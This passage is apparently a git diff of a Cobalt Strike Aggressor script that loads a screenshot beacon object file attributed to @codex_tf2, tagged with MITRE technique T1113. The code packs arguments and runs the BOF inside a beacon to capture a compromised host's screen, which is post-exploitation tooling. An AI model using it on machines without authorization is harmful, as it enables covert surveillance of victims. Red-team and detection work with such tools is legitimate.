# $getOnlyProfile = [$profile shouldChunkPosts];
|
||||||
|
# println($getOnlyProfile);
|
||||||
|
|
||||||
|
$args = bof_pack($bid, "zi", $2, $3);
|
||||||
|
|
||||||
# announce what we're doing
|
# announce what we're doing
|
||||||
btask($1, "Running screenshot BOF by (@codex_tf2)");
|
btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113");
|
||||||
# execute it.
|
# execute it.
|
||||||
beacon_inline_execute($1, $data, "go", $args);
|
beacon_inline_execute($bid, $data, "go", $args);
|
||||||
}
|
}
|
||||||
|
|
Binary file not shown.
Loading…
Reference in New Issue